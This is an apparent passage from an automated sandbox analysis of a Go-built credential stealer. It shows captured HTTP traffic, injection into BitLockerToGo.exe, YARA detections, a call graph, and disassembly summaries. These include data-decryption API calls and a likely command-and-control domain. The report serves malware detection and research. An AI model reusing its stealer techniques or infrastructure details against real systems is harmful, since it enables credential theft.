7c f4 54 5b 8c 97 85 79 09 62 af 48 fb d2 85 d3 e4 13 ab e6 5d f8 2c 86 9c a4 a4 0c 21 ce 40 76 e5
              Data Ascii: J$2ag8W8kZ$sd8d|pmC6AealAcA@BEo(#ecQ"U y(rHjr!Vmz&$Wx4iP:W{5^.mKn{R,!o!zuI;O|F@|T[ybH],!@v
              2024-07-05 04:03:18 UTC15331OUTData Raw: 2e 40 f0 43 bc 16 53 02 e9 32 5e 89 54 40 4d 45 68 76 dd 03 66 17 78 85 1b 24 0f f8 22 8d 28 78 0f ea 31 d4 03 90 1e 75 f1 06 65 0b a4 01 4e cd b8 78 33 42 04 53 ad 8c d2 4d 0b 82 2b 64 cf 43 28 21 6c 3c d2 97 bf 4e 93 a1 fc c6 7a 71 d7 8e b9 34 e2 0d 42 ba 8f 86 a9 84 d3 7d 4a d6 ae cd 4c ac 8d 78 10 16 a4 17 e8 5f e6 58 c8 5f 90 18 d7 a4 ff 5e d4 94 7c d3 f5 a4 b4 8a 73 4e 3e 4b 8f ac 3a b2 ac 29 ff eb 12 7a f0 52 97 e4 8b 43 27 ac 76 9f 97 18 7f 6b 8a 5c a7 fe 5d e1 e4 15 d8 51 b3 26 15 fc 88 ea dd e8 2a 2f 27 8a 72 66 f9 8d 32 74 05 9d a2 94 69 25 d5 9d 20 a2 5e 12 5b 5c bb 30 9c 5b 3d ae d9 3e c8 84 98 6f 04 bf 67 f9 fc 58 b1 9e ea 91 7b b1 3c 83 f6 83 fc 03 30 5c 3d 64 51 82 cb 1a 8c 61 ff 6d 6f fb f1 a5 32 99 74 03 4d eb 98 bd db 2a b2 58 a0 0f 48
              Data Ascii: .@CS2^T@MEhvfx$"(x1ueNx3BSM+dC(!l<Nzq4B}JLx_X_^|sN>K:)zRC'vk\]Q&*/'rf2ti% ^[\0[=>ogX{<0\=dQamo2tM*XH
              2024-07-05 04:03:21 UTC812INHTTP/1.1 200 OK
              Date: Fri, 05 Jul 2024 04:03:21 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=k452lh6ii6q8nskt42k6jpljgv; expires=Mon, 28-Oct-2024 21:49:59 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G6hSoUDcHVe%2BY%2Bo6YePx3XxXy2Irmhkg1wPJ5u6otiqUhawHijKjPsEB6ih%2FqwF2uJIAovqUwDegRRnUUgVEu78m0oL0zoKnRhF2fYZd114Pb0k3K1bgrJP%2BBkjc7TPqhQIzxjqK%2BmJeTScg"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 89e476ebd8a84237-EWR
              alt-svc: h3=":443"; ma=86400


              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:00:02:57
              Start date:05/07/2024
              Path:C:\Users\user\Desktop\6xmBUtHylU.exe
              Wow64 process (32bit):false
              Commandline:"C:\Users\user\Desktop\6xmBUtHylU.exe"
              Imagebase:0x7ff67f190000
              File size:6'814'720 bytes
              MD5 hash:B82C80A3CE9B5C44391D3F11307F8B8E
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:Go lang
              Yara matches:
              • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2208741125.000000C000374000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
              Reputation:low
              Has exited:true

              General

              Target ID:3
              Start time:00:03:08
              Start date:05/07/2024
              Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              Imagebase:0x320000
              File size:231'736 bytes
              MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2279134881.0000000002884000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2279475230.0000000002886000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2227392089.0000000002885000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2265630337.0000000002885000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2250362177.0000000002885000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2265630337.0000000002831000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2238156888.0000000002885000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2250362177.0000000002831000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2279583257.000000000283E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2279134881.0000000002831000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:moderate
              Has exited:true

              Disassembly

              Reset < >

                Execution Graph

                Execution Coverage:15.3%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:40.6%
                Total number of Nodes:315
                Total number of Limit Nodes:11
                execution_graph 11149 262ba6 11150 262bab 11149->11150 11151 262bc3 GetUserDefaultUILanguage 11150->11151 11152 266fa4 GetLogicalDrives 11153 266fb7 11152->11153 11154 263425 11155 263445 11154->11155 11156 263480 GetVolumeInformationW 11155->11156 11429 2416e7 11430 2416f4 11429->11430 11433 245fa0 11430->11433 11432 241707 11434 245fc0 11433->11434 11435 26a5b0 LdrInitializeThunk 11434->11435 11436 246178 11435->11436 11437 246197 11436->11437 11438 26a940 LdrInitializeThunk 11436->11438 11442 24643e 11436->11442 11443 2461c2 11436->11443 11439 26aa50 LdrInitializeThunk 11437->11439 11437->11442 11437->11443 11438->11437 11439->11443 11440 246cb8 11447 267840 LdrInitializeThunk 11440->11447 11445 26a5b0 LdrInitializeThunk 11442->11445 11443->11440 11443->11442 11444 246cc7 11446 2465fa 11445->11446 11446->11432 11447->11444 11448 24d9e0 11449 24da3f 11448->11449 11450 24d9ec 11448->11450 11451 24b540 LdrInitializeThunk 11450->11451 11451->11449 11157 25ab20 11159 25ab25 11157->11159 11158 25ac06 SysAllocString 11160 25ac67 11158->11160 11159->11158 11159->11159 11161 248da2 11162 248da7 11161->11162 11162->11162 11175 245c00 11162->11175 11164 248fbc 11165 245c00 LdrInitializeThunk 11164->11165 11166 2490bc 11165->11166 11167 245c00 LdrInitializeThunk 11166->11167 11168 2491e1 11167->11168 11169 245c00 LdrInitializeThunk 11168->11169 11170 249308 11169->11170 11171 245c00 LdrInitializeThunk 11170->11171 11172 24940a 11171->11172 11173 245c00 LdrInitializeThunk 11172->11173 11174 24953f 11173->11174 11176 245c20 11175->11176 11176->11176 11187 26a5b0 11176->11187 11178 245cfa 11179 245d14 11178->11179 11180 245d32 11178->11180 11183 245d5c 11178->11183 11186 245d0d 11178->11186 11198 26a940 11179->11198 11180->11183 11180->11186 11191 26aa50 11180->11191 11183->11186 11197 267840 LdrInitializeThunk 11183->11197 11185 245f93 11186->11164 11186->11186 11189 26a5d0 11187->11189 11188 26a72e 11188->11178 11189->11188 11202 267840 LdrInitializeThunk 11189->11202 11193 26aa82 11191->11193 11192 26abfe 11192->11183 11195 26ab0e 11193->11195 11203 267840 LdrInitializeThunk 11193->11203 11195->11192 11204 267840 LdrInitializeThunk 11195->11204 11197->11185 11200 26a974 11198->11200 11199 26a9fe 11199->11186 11200->11199 11205 267840 LdrInitializeThunk 11200->11205 11202->11188 11203->11195 11204->11192 11205->11199 11206 2577ae 11208 2577e7 11206->11208 11207 25794e 11208->11207 11210 267840 LdrInitializeThunk 11208->11210 11210->11207 11211 23fe2f 11214 25e680 11211->11214 11215 25e6b6 KiUserCallbackDispatcher GetSystemMetrics 11214->11215 11216 25e6ff DeleteObject 11215->11216 11218 25e75e SelectObject 11216->11218 11220 25e7fa SelectObject 11218->11220 11221 25e823 DeleteObject 11220->11221 11223 254828 11224 254840 11223->11224 11224->11224 11225 26a5b0 LdrInitializeThunk 11224->11225 11226 254a2a 11225->11226 11227 26a5b0 LdrInitializeThunk 11226->11227 11228 254c2a 11227->11228 11229 24662a 11235 246629 11229->11235 11230 26a940 LdrInitializeThunk 11230->11235 11231 246789 11233 26aa50 LdrInitializeThunk 11233->11235 11234 246798 11238 24684e 11234->11238 11240 267840 LdrInitializeThunk 11234->11240 11235->11229 11235->11230 11235->11231 11235->11233 11235->11234 11245 231df0 11235->11245 11237 246955 11237->11237 11238->11237 11238->11238 11241 26a780 11238->11241 11240->11238 11242 26a7a0 11241->11242 11242->11242 11243 26a8ee 11242->11243 11250 267840 LdrInitializeThunk 11242->11250 11243->11238 11246 231e1c 11245->11246 11248 231df8 11245->11248 11246->11235 11251 231e20 11248->11251 11249 231e1b 11249->11235 11250->11243 11252 231e35 11251->11252 11259 231e7d 11251->11259 11253 231fe7 11252->11253 11258 232035 11252->11258 11252->11259 11260 23210f 11252->11260 11261 232ef0 11253->11261 11255 232ef0 RtlAllocateHeap 11255->11260 11256 231e20 RtlAllocateHeap 11256->11258 11257 231e20 RtlAllocateHeap 11257->11260 11258->11256 11258->11259 11259->11249 11260->11255 11260->11257 11260->11259 11262 232f04 11261->11262 11263 232f4f 11261->11263 11262->11263 11265 265512 RtlAllocateHeap 11262->11265 11263->11259 11452 2391f0 11454 2391f9 11452->11454 11453 23924d ExitProcess 11456 23920a 11454->11456 11458 23a310 11454->11458 11456->11453 11457 239220 11456->11457 11457->11453 11459 23a3b5 11458->11459 11460 23a40e LoadLibraryExW 11458->11460 11459->11460 11461 23a448 11460->11461 11461->11456 11270 250fbc 11271 251141 11270->11271 11282 26ae40 11271->11282 11274 251310 11292 26b930 11274->11292 11276 26ae40 LdrInitializeThunk 11278 2511df 11276->11278 11278->11274 11278->11276 11279 2512d1 11278->11279 11281 267840 LdrInitializeThunk 11278->11281 11286 26af90 11278->11286 11281->11278 11283 26ae60 11282->11283 11283->11283 11284 2511b3 11283->11284 11304 267840 LdrInitializeThunk 11283->11304 11284->11274 11284->11278 11284->11279 11298 26b270 11284->11298 11287 26afc2 11286->11287 11289 26b03e 11287->11289 11305 267840 LdrInitializeThunk 11287->11305 11291 26b12e 11289->11291 11306 267840 LdrInitializeThunk 11289->11306 11291->11278 11291->11291 11293 26b950 11292->11293 11295 26ba0e 11293->11295 11307 267840 LdrInitializeThunk 11293->11307 11297 26bb0e 11295->11297 11308 267840 LdrInitializeThunk 11295->11308 11297->11279 11299 26b2a4 11298->11299 11301 26b338 11299->11301 11309 267840 LdrInitializeThunk 11299->11309 11303 26b42e 11301->11303 11310 267840 LdrInitializeThunk 11301->11310 11303->11278 11303->11303 11304->11284 11305->11289 11306->11291 11307->11295 11308->11297 11309->11301 11310->11303 11462 24c67d 11463 24c68b 11462->11463 11467 24d600 11463->11467 11479 250bd0 11463->11479 11464 24c6f6 11468 24d6c0 11467->11468 11469 24d616 11467->11469 11468->11464 11469->11468 11469->11469 11470 26a5b0 LdrInitializeThunk 11469->11470 11471 24d79d 11470->11471 11472 263660 LdrInitializeThunk 11471->11472 11475 24d7da 11471->11475 11473 24d7bf 11472->11473 11473->11468 11474 26a5b0 LdrInitializeThunk 11473->11474 11474->11475 11475->11468 11476 26aa50 LdrInitializeThunk 11475->11476 11477 24d7fc 11476->11477 11477->11468 11483 267840 LdrInitializeThunk 11477->11483 11480 250be9 11479->11480 11482 250d40 11479->11482 11480->11480 11481 24b540 LdrInitializeThunk 11480->11481 11481->11482 11482->11464 11483->11468 11311 2683bc 11312 268400 11311->11312 11313 26848e 11312->11313 11317 267840 LdrInitializeThunk 11312->11317 11316 267840 LdrInitializeThunk 11313->11316 11316->11313 11317->11313 11484 24f2fa 11486 24f2d0 11484->11486 11485 26af90 LdrInitializeThunk 11485->11486 11486->11484 11486->11485 11487 24f353 11486->11487 11489 24f365 11486->11489 11488 26ae40 LdrInitializeThunk 11487->11488 11488->11489 11489->11489 11318 268106 11319 268167 11318->11319 11320 26830e 11319->11320 11322 267840 LdrInitializeThunk 11319->11322 11322->11320 11490 267bc4 11491 267bf8 11490->11491 11493 267c98 11491->11493 11496 267840 LdrInitializeThunk 11491->11496 11492 267d7e 11493->11492 11497 267840 LdrInitializeThunk 11493->11497 11496->11493 11497->11492 11323 243187 11324 243190 11323->11324 11324->11324 11327 24b540 11324->11327 11328 24b5c0 11327->11328 11331 24ba00 11328->11331 11332 26a5b0 LdrInitializeThunk 11331->11332 11333 24ba59 11332->11333 11334 242687 11335 242690 11334->11335 11338 2486e0 11335->11338 11337 2426a7 11339 248700 11338->11339 11340 26a780 LdrInitializeThunk 11339->11340 11343 24875f 11340->11343 11341 24876e 11341->11337 11342 24885e 11345 24ba00 LdrInitializeThunk 11342->11345 11343->11341 11343->11342 11343->11343 11344 24ba00 LdrInitializeThunk 11343->11344 11344->11342 11345->11342 11346 24ff00 11347 26ae40 LdrInitializeThunk 11346->11347 11348 24ff23 11347->11348 11349 267502 11350 267510 11349->11350 11350->11350 11351 267560 LoadLibraryExW 11350->11351 11351->11350 11352 24ae80 11353 24ae8e 11352->11353 11355 24aed0 11352->11355 11356 24af90 11353->11356 11357 24afe8 11356->11357 11357->11357 11358 26a780 LdrInitializeThunk 11357->11358 11359 24b0ed 11358->11359 11359->11355 11498 23fbc4 11499 23fbfd 11498->11499 11510 24e880 11499->11510 11501 23fd3e 11520 24f060 11501->11520 11503 23fd5e 11504 251910 LdrInitializeThunk 11503->11504 11505 23fda7 11504->11505 11506 251dc0 LdrInitializeThunk 11505->11506 11507 23fdb0 11506->11507 11508 25e4a0 6 API calls 11507->11508 11509 23fdf9 11508->11509 11511 24e8f3 11510->11511 11512 26a780 LdrInitializeThunk 11511->11512 11517 24eb17 11512->11517 11513 24ed04 11514 24ba00 LdrInitializeThunk 11513->11514 11515 24ee4f 11513->11515 11519 24f003 11513->11519 11514->11515 11515->11515 11516 24b540 LdrInitializeThunk 11515->11516 11516->11519 11517->11513 11517->11515 11518 26a780 LdrInitializeThunk 11517->11518 11518->11513 11519->11501 11521 24f110 11520->11521 11521->11521 11522 2486e0 LdrInitializeThunk 11521->11522 11523 24f272 11522->11523 11364 248088 11365 248128 11364->11365 11366 24b540 LdrInitializeThunk 11365->11366 11367 248530 11366->11367 11524 258c4b 11530 2699c0 11524->11530 11526 258c5b GetComputerNameExA 11527 258cae 11526->11527 11527->11527 11528 258d83 GetComputerNameExA 11527->11528 11529 258dd1 11528->11529 11531 2699f1 11530->11531 11531->11526 11531->11531 11532 2677d6 11533 2677e3 RtlReAllocateHeap 11532->11533 11372 246790 11373 246795 11372->11373 11375 24684e 11373->11375 11378 267840 LdrInitializeThunk 11373->11378 11376 246955 11375->11376 11377 26a780 LdrInitializeThunk 11375->11377 11376->11376 11377->11375 11378->11375 11534 246cd0 11536 246ce0 11534->11536 11535 246e7e CryptUnprotectData 11537 246ea5 11535->11537 11536->11535 11537->11537 11538 24b8d1 11539 24b8d6 11538->11539 11539->11539 11540 24ba00 LdrInitializeThunk 11539->11540 11541 24b998 11540->11541 11379 24709b 11380 2470de 11379->11380 11381 245c00 LdrInitializeThunk 11380->11381 11382 247145 11381->11382 11383 245c00 LdrInitializeThunk 11382->11383 11384 247200 11383->11384 11385 245c00 LdrInitializeThunk 11384->11385 11386 247316 11385->11386 11387 245c00 LdrInitializeThunk 11386->11387 11388 2473dd 11387->11388 11390 245c00 LdrInitializeThunk 11388->11390 11391 247a60 11388->11391 11394 263660 11388->11394 11390->11388 11391->11391 11392 24b540 LdrInitializeThunk 11391->11392 11393 247ffd 11392->11393 11395 26a5b0 LdrInitializeThunk 11394->11395 11404 263682 11395->11404 11396 2637f4 11396->11388 11397 263812 11412 265bd0 11397->11412 11400 263857 11400->11396 11424 267840 LdrInitializeThunk 11400->11424 11403 26373e 11403->11396 11403->11397 11403->11400 11408 265980 11403->11408 11404->11396 11404->11397 11404->11400 11404->11403 11407 267840 LdrInitializeThunk 11404->11407 11407->11403 11409 265a8e 11408->11409 11410 265997 11408->11410 11409->11403 11410->11409 11425 267840 LdrInitializeThunk 11410->11425 11413 263823 11412->11413 11414 265beb 11412->11414 11420 265ad0 11413->11420 11414->11413 11418 265cae 11414->11418 11426 267840 LdrInitializeThunk 11414->11426 11415 265ad0 LdrInitializeThunk 11415->11413 11417 265dbe 11417->11413 11417->11415 11418->11417 11427 267840 LdrInitializeThunk 11418->11427 11421 265ae6 11420->11421 11422 265b9e 11420->11422 11421->11422 11428 267840 LdrInitializeThunk 11421->11428 11422->11396 11424->11396 11425->11409 11426->11418 11427->11417 11428->11422

                Executed Functions

                Function 0025E680 Relevance: 42.2, APIs: 6, Strings: 18, Instructions: 174COMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
                • String ID: %$ $0%$=%$d%$d%$d%$d%$d%$d%$d%$d%$d%$d%$d%$d%$d%$%
                • API String ID: 1449868515-3877251930
                • Opcode ID: 8c10c3568b3d2cc95893da5cc164a9dbc802a1e7b36923cc51df75e45fcd38a9
                • Instruction ID: 8cbc8028599e4161cfe7936fb7de0aa996f67dba11790ebd307913682356b689
                • Opcode Fuzzy Hash: 8c10c3568b3d2cc95893da5cc164a9dbc802a1e7b36923cc51df75e45fcd38a9
                • Instruction Fuzzy Hash: BEA169B8519384CFD364EF29D549B8EBBE0BB86308F01891DE4989B350D7B49958CF83
                Function 00250BD0 Relevance: 11.5, Strings: 9, Instructions: 288COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 277 250bd0-250be3 278 250d40-250d42 277->278 279 250be9-250c83 277->279 280 250f4d-250f56 278->280 281 250c85 279->281 282 250cd2-250d01 279->282 284 250c90-250cd0 281->284 283 250d10-250d19 282->283 283->283 285 250d1b 283->285 284->282 284->284 286 250d20-250d29 285->286 286->286 287 250d2b-250d37 286->287 288 250d47-250d4b 287->288 289 250d39-250d3e 287->289 290 250d4e-250d5f call 238b70 288->290 289->290 293 250d81-250d8f 290->293 294 250d61-250d66 290->294 296 250db1-250dbe 293->296 297 250d91-250d94 293->297 295 250d70-250d7f 294->295 295->293 295->295 298 250de1-250e1a 296->298 299 250dc0-250dc4 296->299 300 250da0-250daf 297->300 302 250e65-250ed4 298->302 303 250e1c-250e1f 298->303 301 250dd0-250ddf 299->301 300->296 300->300 301->298 301->301 305 250ed6 302->305 306 250f21-250f3a call 24b540 302->306 304 250e20-250e63 303->304 304->302 304->304 307 250ee0-250f1f 305->307 309 250f3f-250f4a call 238b80 306->309 307->306 307->307 309->280
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: %M#O$2qps$6U3W$>] _$J9t;$M-P/$\9V;$]!L#$i[k
                • API String ID: 0-229164349
                • Opcode ID: be216cfc19fc37cba791122f34637780977f9b688bb577a6aa96b9ab978fc0fa
                • Instruction ID: a9c25398d451c8176f8b4af4255b80e9c6a7a5d708ad25a43d33b15c6f077232
                • Opcode Fuzzy Hash: be216cfc19fc37cba791122f34637780977f9b688bb577a6aa96b9ab978fc0fa
                • Instruction Fuzzy Hash: 059197B15183019BD314CF08C891B6BBBF1EF85758F188A1DF8C98B291E774D955CB8A
                Function 0024E880 Relevance: 9.3, Strings: 7, Instructions: 548COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 320 24e880-24e8f1 321 24e960-24e9a3 320->321 322 24e8f3 320->322 325 24e9a5-24e9aa 321->325 326 24e9ac 321->326 323 24e900-24e95e 322->323 323->321 323->323 327 24e9af-24ea13 call 238b70 325->327 326->327 331 24ea15 327->331 332 24ea62-24ea8f 327->332 333 24ea20-24ea60 331->333 334 24ea91-24ea96 332->334 335 24ea98-24ea9a 332->335 333->332 333->333 336 24ea9d-24eaae call 238b70 334->336 335->336 339 24eab0-24eab5 336->339 340 24ead1-24eae1 336->340 341 24eac0-24eacf 339->341 342 24eb01-24eb26 call 26a780 340->342 343 24eae3-24eaea 340->343 341->340 341->341 347 24ed15-24ed22 342->347 348 24ee75-24eeaa 342->348 349 24eb40-24ebf8 342->349 350 24ed30-24edf2 342->350 351 24eb2d-24eb37 342->351 352 24ed2a 342->352 344 24eaf0-24eaff 343->344 344->342 344->344 347->352 357 24eee6-24ef83 348->357 358 24eeac-24eeaf 348->358 355 24ec55-24ec82 349->355 356 24ebfa 349->356 353 24edf4 350->353 354 24ee37-24ee4a call 24ba00 350->354 351->349 352->350 361 24ee00-24ee35 353->361 370 24ee4f-24ee52 354->370 364 24ec84-24ec89 355->364 365 24ec8b-24ec8d 355->365 363 24ec00-24ec53 356->363 359 24ef85 357->359 360 24efe7-24f006 call 24b540 357->360 366 24eeb0-24eee4 358->366 368 24ef90-24efe5 359->368 377 24f00e 360->377 361->354 361->361 363->355 363->363 367 24ec90-24eca1 call 238b70 364->367 365->367 366->357 366->366 375 24ecc1-24ecd1 367->375 376 24eca3-24ecaa 367->376 368->360 368->368 374 24ee5a 370->374 381 24ee60-24ee6c call 238b80 374->381 379 24ecf1-24ed0e call 26a780 375->379 380 24ecd3-24ecda 375->380 378 24ecb0-24ecbf 376->378 383 24f014-24f01f call 238b80 377->383 378->375 378->378 379->347 379->348 379->352 379->374 379->377 379->381 379->383 390 24f044 379->390 391 24f020-24f026 call 238b80 379->391 392 24f02f 379->392 393 24f04a 379->393 394 24f035-24f03b call 238b80 379->394 395 24f056-24f05f 379->395 396 24f050 379->396 382 24ece0-24ecef 380->382 381->348 382->379 382->382 383->391 390->393 391->392 392->394 393->396 394->390 396->395
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: `w$b6$cw$pD$sm$~w$IK
                • API String ID: 0-200013828
                • Opcode ID: d56207edc5df73067c3cb23cc7f5528efc44b285c30c6587dc332019aba30a87
                • Instruction ID: af2394fc85c973728bc9ae6bc369fcfdeb6eb01f12b85ef56b5d54afe34af40f
                • Opcode Fuzzy Hash: d56207edc5df73067c3cb23cc7f5528efc44b285c30c6587dc332019aba30a87
                • Instruction Fuzzy Hash: 091264B02183819FD728DF14D89076BBBF1FF85348F448A2CE4DA9B291D7749946CB86
                Function 0023F490 Relevance: 9.0, Strings: 7, Instructions: 264COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 401 23f490-23f4ca 402 23f51c-23f599 401->402 403 23f4cc-23f4cf 401->403 405 23f5f5-23f606 402->405 406 23f59b 402->406 404 23f4d0-23f51a 403->404 404->402 404->404 408 23f61b-23f623 405->408 409 23f608-23f60f 405->409 407 23f5a0-23f5f3 406->407 407->405 407->407 411 23f625-23f626 408->411 412 23f63b-23f648 408->412 410 23f610-23f619 409->410 410->408 410->410 413 23f630-23f639 411->413 414 23f66b-23f673 412->414 415 23f64a-23f651 412->415 413->412 413->413 416 23f675-23f676 414->416 417 23f68b-23f7d7 414->417 418 23f660-23f669 415->418 419 23f680-23f689 416->419 420 23f82a-23f88c 417->420 421 23f7d9 417->421 418->414 418->418 419->417 419->419 423 23f8e6-23f90d call 23c3b0 420->423 424 23f88e-23f88f 420->424 422 23f7e0-23f828 421->422 422->420 422->422 427 23f912-23f92c 423->427 425 23f890-23f8e4 424->425 425->423 425->425
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: Fty~$Nxav$citizencenturygoodwk.shop$imk/$}NQ~$~q$y{
                • API String ID: 0-1436070459
                • Opcode ID: 2688bfa67c234044be391b1faf937c4f2d5bfc0d670027e0dd8eda5ed911e1cf
                • Instruction ID: 9a41ac17dbffe10a05678dd9eb5e0f85425e34e27d91bfc3d375d0e59c4cf59d
                • Opcode Fuzzy Hash: 2688bfa67c234044be391b1faf937c4f2d5bfc0d670027e0dd8eda5ed911e1cf
                • Instruction Fuzzy Hash: 18B186B05493C28BD3308F14D594BABBBE1BFC6318F184A6CD4E86B262D33459458B96
                Function 00239C30 Relevance: 8.0, Strings: 6, Instructions: 470COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 428 239c30-239c43 429 239c81-239c83 428->429 430 239c45-239c51 428->430 433 23a2f7-23a300 429->433 431 239c53-239c55 430->431 432 239c88-239c95 430->432 434 239c97-239c9e 431->434 435 239c57-239c7f 431->435 436 239ccc-239d49 call 236a40 call 2632f0 call 238b70 432->436 438 239ca0-239cb5 434->438 439 239cb7-239cc7 434->439 435->438 445 239da3-239dd7 call 239510 436->445 446 239d4b 436->446 438->436 439->436 450 239e30-239e6a call 239510 445->450 451 239dd9 445->451 447 239d50-239da1 446->447 447->445 447->447 455 239eae-239ef8 call 239510 450->455 456 239e6c-239e6f 450->456 453 239de0-239e2e 451->453 453->450 453->453 460 239efa 455->460 461 239f4e-239f74 455->461 457 239e70-239eac 456->457 457->455 457->457 462 239f00-239f4c 460->462 463 239f76 461->463 464 239fc5-23a003 call 239510 461->464 462->461 462->462 465 239f80-239fc3 463->465 468 23a005 464->468 469 23a04b-23a1d1 call 2397d0 464->469 465->464 465->465 470 23a010-23a049 468->470 473 23a1d3 469->473 474 23a23f-23a275 469->474 470->469 470->470 475 23a1e0-23a23d 473->475 476 23a277 474->476 477 23a2bb-23a2e2 call 23e300 call 238b80 474->477 475->474 475->475 478 23a280-23a2b9 476->478 482 23a2e7-23a2f0 477->482 478->477 478->478 482->433
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: 0$@A$D=C?$MT$N\KO$RZ
                • API String ID: 0-3970104136
                • Opcode ID: 7c635f16c986e7b9e7db33a05ddff2aed9ebf9d5085147d8a85ec44971303022
                • Instruction ID: 380879797b187d1850263fa619dea1df1d073bc6f639667b8e9ecff8be8089b5
                • Opcode Fuzzy Hash: 7c635f16c986e7b9e7db33a05ddff2aed9ebf9d5085147d8a85ec44971303022
                • Instruction Fuzzy Hash: AA0242B0218381AFD314CF24C490B6BBBE2ABC5744F14992DF4DA8B391D779D84ADB52
                Function 00258C4B Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 477COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 483 258c4b-258cac call 2699c0 GetComputerNameExA 486 258d22-258d27 483->486 487 258cae-258caf 483->487 489 258d4d-258d53 486->489 490 258d29-258d36 486->490 488 258cb0-258d20 487->488 488->486 488->488 492 258d59-258d61 489->492 491 258d40-258d49 490->491 491->491 493 258d4b 491->493 494 258d63-258d6a 492->494 495 258d7d 492->495 493->492 496 258d70-258d79 494->496 497 258d83-258dcf GetComputerNameExA 495->497 496->496 498 258d7b 496->498 499 258dd1 497->499 500 258e1e-258e23 497->500 498->497 503 258de0-258e1c 499->503 501 258e25-258e2f 500->501 502 258e3d 500->502 504 258e30-258e39 501->504 505 258e43-258e4b 502->505 503->500 503->503 504->504 506 258e3b 504->506 507 258e6d 505->507 508 258e4d-258e54 505->508 506->505 510 258e73-258ec3 507->510 509 258e60-258e69 508->509 509->509 511 258e6b 509->511 513 258ec5 510->513 514 258f13-258f18 510->514 511->510 517 258ed0-258f11 513->517 515 258f2d 514->515 516 258f1a-258f1f 514->516 519 258f30-258f38 515->519 518 258f20-258f29 516->518 517->514 517->517 518->518 520 258f2b 518->520 521 258f4b-258f9b call 2699c0 519->521 522 258f3a-258f3b 519->522 520->519 527 258f9d-258f9f 521->527 528 